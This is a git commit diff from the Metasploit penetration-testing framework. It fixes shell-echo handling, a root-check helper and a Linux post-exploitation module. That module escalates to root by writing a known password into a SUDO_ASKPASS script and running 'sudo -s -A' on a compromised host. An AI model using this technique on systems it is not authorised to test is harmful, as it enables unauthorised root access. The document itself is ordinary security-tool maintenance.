Always try both export and setenv. Fixups to allow for correct reading from echoy nix shells. Fixes is_root? to not treat an empty string as 0

2011-11-16 16:48:19 -06:00 · 2011-11-16 16:48:19 -06:00 · 93a133d5de
parent 725431dbdb
commit 93a133d5de
4 changed files with 32 additions and 15 deletions
--- a/lib/msf/core/auxiliary/login.rb
+++ b/lib/msf/core/auxiliary/login.rb
@ -130,7 +130,7 @@ module Auxiliary::Login
 	end

 	def password_prompt?
-		return true if @recvd =~ @password_regex
+		return true if(@recvd =~ @password_regex or @recvd =~ /#{datastore['USERNAME']}'s/)
 		return false
 	end

--- a/lib/msf/core/post/linux/priv.rb
+++ b/lib/msf/core/post/linux/priv.rb
@ -10,10 +10,12 @@ module Priv
 	def is_root?
 		root_priv = false
 		user_id = cmd_exec("id -u")
-			if user_id.to_i == 0
+		if user_id and !user_id.empty?
+			if user_id.strip.lstrip.to_i == 0
 				root_priv = true
-			elsif user_id =~ /^\d*$/
+			elsif user_id.to_s =~ /^\d*$/
 				root_priv = false
+			end
 		else
 			raise "Could not determine UID: #{user_id}"
 		end
--- a/lib/msf/core/session/provider/single_command_shell.rb
+++ b/lib/msf/core/session/provider/single_command_shell.rb
@ -91,12 +91,27 @@ module SingleCommandShell
 	def shell_command_token_unix(cmd, timeout=10)
 		# read any pending data
 		buf = shell_read(-1, 0.01)
+		set_shell_token_index(timeout)
 		token = ::Rex::Text.rand_text_alpha(32)

 		# Send the command to the session's stdin.
-		# NOTE: if the session echoes input we don't need to echo the token twice.
 		shell_write(cmd + ";echo #{token}\n")
-		shell_read_until_token(token, 0, timeout)
+		shell_read_until_token(token, @shell_token_index, timeout)
+	end
+
+	# NOTE: if the session echoes input we don't need to echo the token twice.
+	def set_shell_token_index(timeout)
+		return @shell_token_index if @shell_token_index
+		token = ::Rex::Text.rand_text_alpha(32)
+		numeric_token = rand(0xffffffff) + 1
+		cmd = "echo #{numeric_token}"
+		shell_write(cmd + ";echo #{token}\n")
+		res = shell_read_until_token(token, 0, timeout)
+		if res.to_i == numeric_token
+			@shell_token_index = 0
+		else
+			@shell_token_index = 1
+		end
 	end

 	#
--- a/modules/post/linux/manage/sudo.rb
+++ b/modules/post/linux/manage/sudo.rb
@ -48,6 +48,7 @@ class Metasploit3 < Msf::Post
 	def run
 		print_status("SUDO: Attempting to upgrade to UID 0 via sudo")
 		sudo_bin = cmd_exec("which sudo")
+		my_id = cmd_exec("id -u")
 		if is_root?
 			print_status "Already root, so no need to upgrade permissions. Aborting."
 			return
@ -98,10 +99,9 @@ class Metasploit3 < Msf::Post
 					cmd_exec("echo echo #{password} >> #{askpass_sh}")
 					cmd_exec("chmod +x #{askpass_sh}")
 					vprint_status "Setting environment variable."
-					# Bruteforce-set the environment variable? is cmd_exec() always
-					# going to be in the context of /bin/sh ?
+					# Bruteforce-set the environment variable with both setenv and export.
 					askpass_env = cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}") 
-					cmd_exec("export SUDO_ASKPASS=#{askpass_sh}") if askpass_env.to_s.empty?
+					cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
 					vprint_status "Executing sudo -s -A"
 					cmd_exec("sudo -s -A")
 					vprint_status "Deleting the askpass script."